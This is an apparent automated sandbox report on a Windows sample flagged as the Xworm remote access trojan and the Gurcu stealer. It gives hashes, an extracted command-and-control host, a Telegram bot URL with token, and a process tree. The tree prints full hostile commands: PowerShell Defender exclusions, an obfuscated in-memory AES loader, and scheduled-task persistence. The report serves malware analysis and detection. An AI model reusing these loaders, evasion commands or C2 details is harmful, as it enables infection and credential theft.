Resubmissions

03-08-2024 03:03

240803-dj3vqs1dmq 10

03-08-2024 02:30

240803-czebmsvele 10

Analysis

  • max time kernel
    106s
  • max time network
    110s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-08-2024 03:03

Errors

Reason
Machine shutdown

General

  • Target

    fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe

  • Size

    19.2MB

  • MD5

    aa4bb4c57074e543076b145b7399cd64

  • SHA1

    5e36e64cc686fa553b43d1c274d1a15e18b50501

  • SHA256

    fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7

  • SHA512

    ff38fc85d51fda9d32668949d2f67074be1e52cb6d63978155347173452199687935b9e96d3a060c7ab74461c5f4228b2c4cf8a0486ca5bbd9ea962a1c16c5eb

  • SSDEEP

    393216:0W7LVQgX47mXZGbWVQjFLICQA122lrL8jiQIthY4eqfIgUJzM8/bX9Wwy:NBfXZGbBjFLICB1hUji1tWbZT9W/

Malware Config

Extracted

Family

xworm

C2

floor-talked.gl.at.ply.gg:52348

Attributes
  • Install_directory

    %AppData%

  • install_file

    processor.exe

  • telegram

    https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Extracted

Family

gurcu

C2

https://api.telegram.org/bot6944368626:AAEvUk2RtxxeA2BAieiHfX1ijoOaWr__RyY/sendMessage?chat_id=6270056635

Signatures

  • Detect Xworm Payload 1 IoCs
  • Gurcu, WhiteSnake

    Gurcu is a malware stealer written in C#.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 4 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • NTFS ADS 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 35 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe
    "C:\Users\Admin\AppData\Local\Temp\fd322e2a6a8d43ac59508e0f8c4c9b3521e7c543912c606bf3567179ce38d2f7.exe"
    1⤵
    • Checks computer location settings
    PID:2132
    • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
      "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      PID:1604
      • C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
        "C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
        3⤵
        • Executes dropped EXE
        PID:4800
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4240
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
        3⤵
          PID:3596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            PID:5868
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_684_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_684.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              5⤵
              • Command and Scripting Interpreter: PowerShell
              PID:5656
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_684.vbs"
              5⤵
              • Checks computer location settings
              PID:5176
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_684.bat" "
                6⤵
                  PID:5844
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_684.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:3860
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3672
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
            3⤵
              PID:5476
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat'
            2⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3244
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\invoicer.bat" "
            2⤵
              PID:3164
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                3⤵
                • Command and Scripting Interpreter: PowerShell
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4828
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_456_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_456.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4448
                • C:\Windows\System32\WScript.exe
                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_456.vbs"
                  4⤵
                  • Checks computer location settings
                  PID:5652
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_456.bat" "
                    5⤵
                      PID:5128
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_456.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                        6⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Drops startup file
                        • Suspicious behavior: AddClipboardFormatListener
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of SetWindowsHookEx
                        PID:3152
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4452
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
                2⤵
                  PID:5028
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4956
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_609_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_609.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                      4⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2128
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_609.vbs"
                      4⤵
                      • Checks computer location settings
                      PID:5884
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_609.bat" "
                        5⤵
                          PID:6140
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_609.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                            6⤵
                            • Command and Scripting Interpreter: PowerShell
                            • Adds Run key to start application
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3704
                            • C:\Windows\System32\attrib.exe
                              "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system"
                              7⤵
                              • Sets file to hidden
                              • Views/modifies file attributes
                              PID:6132
                            • C:\Windows\System32\attrib.exe
                              "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system\system.exe"
                              7⤵
                              • Sets file to hidden
                              • Views/modifies file attributes
                              PID:5956
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1F89.tmp.bat""
                              7⤵
                                PID:5308
                                • C:\Windows\system32\timeout.exe
                                  timeout 3
                                  8⤵
                                  • Delays execution with timeout.exe
                                  PID:4452
                                • C:\Users\Admin\system\system.exe
                                  "C:\Users\Admin\system\system.exe"
                                  8⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:5556
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
                    1⤵
                    • Enumerates system info in registry
                    • NTFS ADS
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of WriteProcessMemory
                    PID:1364
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe832d46f8,0x7ffe832d4708,0x7ffe832d4718
                      2⤵
                        PID:1116
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
                        2⤵
                          PID:692
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 /prefetch:3
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4220
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
                          2⤵
                            PID:3316
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
                            2⤵
                              PID:3792
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
                              2⤵
                                PID:392
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
                                2⤵
                                  PID:4848
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,6659629416460716393,9580340883982484246,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
                                  2⤵
                                    PID:860
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
